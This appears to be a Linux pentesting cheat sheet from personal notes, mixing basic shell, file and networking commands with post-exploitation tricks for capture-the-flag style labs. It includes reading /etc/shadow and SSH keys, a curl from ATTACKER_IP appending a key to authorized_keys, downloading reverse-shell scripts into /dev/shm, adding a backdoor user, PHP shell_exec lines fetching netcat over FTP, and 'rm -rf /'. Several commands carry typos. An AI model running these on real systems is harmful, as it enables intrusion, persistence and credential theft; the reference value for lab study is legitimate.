Linux
MISC / TIPS
# If you need to kill a specific process using a given port
sudo fuser -k 445/tcp
# You can use the following trick to easy navigate and select paths or others args
# $_ takes the last argument of the last simplec command executed
cd $_
# For example
mkdir my-folder && cd $_
# You can use xclip to automate clipping
# Can be usefull for long outputs (enum4linux, privcheck...)
cat /etc/resolv.conf | xclip -sel clip
# You can even create aliases
alias toclip="xclip -sel clip"
cat /etc/resolv.conf | toclip
Linux File Permission
(r)ead = Read permission only allow the user to read the content.
(x)Execute = The user has permission to execute the program.
(w)Write = The user can modify or delete the file/program.
(s)SUID = File Executed with same privilege of the owner(For example root).
(s)SGID = File Executed with same privilege of the group.
uname -a #Get kernel information
hostname #Get Host information
ip add #Get current IP address
Check User info and Common Files
- Current user details
- Last logged on users
- List all users
- Password stored in /etc/passwd?
- Try to read restricted files
- Read user History: .bash_history, .nano_history, .mysql_history , etc.
whoami #current username
cat /etc/passwd|grep bash #List all usres that has bash access
cat /etc/group #See which user has higher privilege
cat /etc/shadow #attempt to read restricted files
cat ~/.bash_history #Read common history files for sensitive data
locate password | more #Search for files that has 'password' word
find / -name authorized_keys 2> /dev/null #Find for ssh key
find / -name id_rsa 2> /dev/null #find for ssh Key
Find Backup Files
/home
/root
/tmp
/var
/var/backups
/opt
Common Bash
#Exfiltration using Base64
base64 -w 0 file
#Get HexDump without new lines
xxd -p boot12.bin | tr -d '\n'
#Add public key to authorized keys
curl https://ATTACKER_IP/.ssh/id_rsa.pub >> ~/.ssh/authotized_keys
#Echo without new line and Hex
echo -n -e
#Count
wc -l <file> #Lines
wc -c #Chars
#Sort
sort -nr #Sort by number and then reverse
cat file | sort | uniq #Sort and delete duplicates
#Replace in file
sed -i 's/OLD/NEW/g' path/file #Replace string inside a file
#Download in RAM
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
#Files used by network processes
lsof #Open files belonging to any process
lsof -p 3 #Open files used by the process
lsof -i #Files used by networks processes
lsof -i 4 #Files used by network IPv4 processes
lsof -i 6 #Files used by network IPv6 processes
lsof -i 4 -a -p 1234 #List all open IPV4 network files in use by the process 1234
lsof +D /lib #Processes using files inside the indicated dir
lsof -i :80 #Files uses by networks processes
fuser -nv tcp 80
#Decompress
tar -xvzf /path/to/yourfile.tgz
tar -xvjf /path/to/yourfile.tbz
bzip2 -d /path/to/yourfile.bz2
tar jxf file.tar.bz2
gunzip /path/to/yourfile.gz
unzip file.zip
7z -x file.7z
sudo apt-get install xz-utils; unxz file.xz
#Add new user
useradd -p 'openssl passwd -1 <Password>' hacker
#Clipboard
xclip -sel c < cat file.txt
#HTTP servers
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
curl -X GET -H 'Authorization: Bearer <JWT>' http://host:3000/endpoint
#Send Email
sendEmail -t to@email.com -f from@email.com -s 192.168.8.131 -u Subject -a file.pdf #You will be prompted for the content
#DD copy hex bin file without first X (28) bytes
dd if=file.bin bs=28 skip=1 of=blob
#Mount .vhd files (virtual hard drive)
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a private key. Recommended to set the "Organizatoin Name"(Fortune) and the "Common Name" (newuser@fortune.htb)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
#Decrypt
openssl enc -aes256 -k <KEY> -d -in backup.tgz.enc -out b.tgz
#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"
#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
sudo dpkg-reconfigure tzdata
#Search from wich package is a binary
apt-file search /usr/bin/file #Needed: apt-get install apt-file
#Protobuf decode https://www.ezequiel.tech/2020/08/leaking-google-cloud-projects.html
echo "CIKUmMesGw==" | base64 -d | protoc --decode_raw
#Set not removable bit
sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it
FILE TRANSFER
NFS
# You can remotely mount NFS volumes
mount -t nfs xx.xx.xx.xx:/ /tmp/a
Linux FTP
#!/bin/sh
ftp -n IP <<END_SCRIPT
quote USER acknak
quote PASS jLQRZy4gyLhmMqz2whTw
binary
GET file.py
quit
END_SCRIPT
exit 0
# Can also be done over php:
<?php echo shell_exec("echo open 192.168.42.102 21>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user acknak jLQRZy4gyLhmMqz2whTw>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>
Commands
Files and navigations
ls - directory listing (list all files/folders on current dir)
ls -l - formatted listing
ls -la - formatted listing including hidden files
cd dir - change directory to dir (dir will be directory name)
cd.. - change to parent directory
cd.. /dir - change to dir in parent directory
cd - change to home directory
pwd - show current directory
mkdir dir - create a directory dir
rm file - delete file
rm -f dir - force remove file
rm -rf dir - remove directory dir
rm -rf / - launch some nuclear bombs, don't do that !!!!
cp file1 file2 - copy filel to filez
mv file1 file2 - rename filel to file2
mv file1 dir/file2 - move filel to dir as file2
touch file - create or update file
cat file - output contents of file
cat > file - write standard inout into file
cat >> file - append standard input into file
tail -f file - output contents or file as It grows
System info
date - show current date/time
uptime - show uptime
whoami - who you're logged in as
w- display who is online
cat /proc/cpuinfo - display cpu info
cat /proc/meminfo - memory info
free - show memory and swap usage
du - show diroctory space usago
du -sh - displays readable sizes in GB
df - show disk usage
uname -a - show karne confic
Compressing
tar cf file.tar files - tar files into file.tar
tar xf file.tar - untar into current directory
tort filetar - show contents of archive
options :
c - create archive
t - table of contents
x - extract
z - use zip/gzip
f - specify filename
j - bzip2 compression
w - ask for comfirmation
k - do not overwrite
T - files from file
v - verbose
Networking
ping host - ping host
whois domain - get whois for domain
dig domain - get DNS for domain
dig -x host - reserve lookup host
wget file - download
wget -c file - continue stopped download
wget -r url - recurively download files from url
curl url - outputs the webpage from url
curl -o meh.html url - writes the pages to meh.html
ssh user@host - connect to host as user
processes
ps - display currently active processes
ps aux - detailled outputs
kill pid - kill process with process id
killall proc - kill all processes named proc
Permissions
chmod octal file - change permissions of file
4 - read (r)
2 - write (w)
1 - execute (x)
order : owner/group/world
chmod 777 - rwx for everyone
chmod 755 - rw for owner, rx for group world
Some Others
grep pattern files - search in files for pattern
grep -r pattern dir - search for pattern recursively in dir
locate file - find all instances of file
whereis app - show possible localtions of app
man command - show manual page of command